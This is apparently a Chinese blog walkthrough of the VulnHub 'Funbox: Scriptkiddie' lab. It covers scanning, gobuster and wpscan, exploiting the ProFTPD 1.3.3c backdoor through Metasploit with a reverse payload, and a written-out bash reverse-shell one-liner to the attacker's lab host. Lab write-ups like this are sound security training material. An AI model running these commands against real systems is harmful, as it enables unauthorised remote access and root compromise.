vulnhub之Funbox: Scriptkiddie

靶机ip:192.168.181.155

kali IP : 192.168.181.129

首先进行IP扫描

vulnhub之Funbox: Scriptkiddie_第1张图片

 然后我查看ip端口开启哪些服务

vulnhub之Funbox: Scriptkiddie_第2张图片

vulnhub之Funbox: Scriptkiddie_第3张图片

 我们看见他开启了80端口,于是我们打开网页进行查看

 于是我进行目录探测,看看他有没有给我们一些提示

gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

于是我认为他们开启了wordpress,于是我打开/wp-admin

vulnhub之Funbox: Scriptkiddie_第4张图片

 发现他确实有wp,于是我使用wpscan进行查看

wpscan --url http://192.168.181.155/wp-content/ -e --api-token ************

vulnhub之Funbox: Scriptkiddie_第5张图片

 好像不可以,于是我查看ip端口的协议是否有漏洞,当我查看第一个ftp时就发现有漏洞

 有远程命令执行的漏洞,于是我进行查看

https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/

他告诉我漏洞利用过程

于是我打开msfconsole

vulnhub之Funbox: Scriptkiddie_第6张图片

 use 0

show options

vulnhub之Funbox: Scriptkiddie_第7张图片  但是我们要增加一个payload

show payloads

vulnhub之Funbox: Scriptkiddie_第8张图片

 于是进行添加

set payload cmd/unix/reverse

 vulnhub之Funbox: Scriptkiddie_第9张图片

于是对靶机进行攻击

rhost 是攻击靶机的ip

lhost 是kali的ip

 于是获得root权限

 于是我将他反弹到kali

bash -c 'bash -i >& /dev/tcp/192.168.181.129/9001 0>&1'

vulnhub之Funbox: Scriptkiddie_第10张图片

 于是才root目录下获得最终的flagvulnhub之Funbox: Scriptkiddie_第11张图片

你可能感兴趣的:(网络安全,系统安全,安全)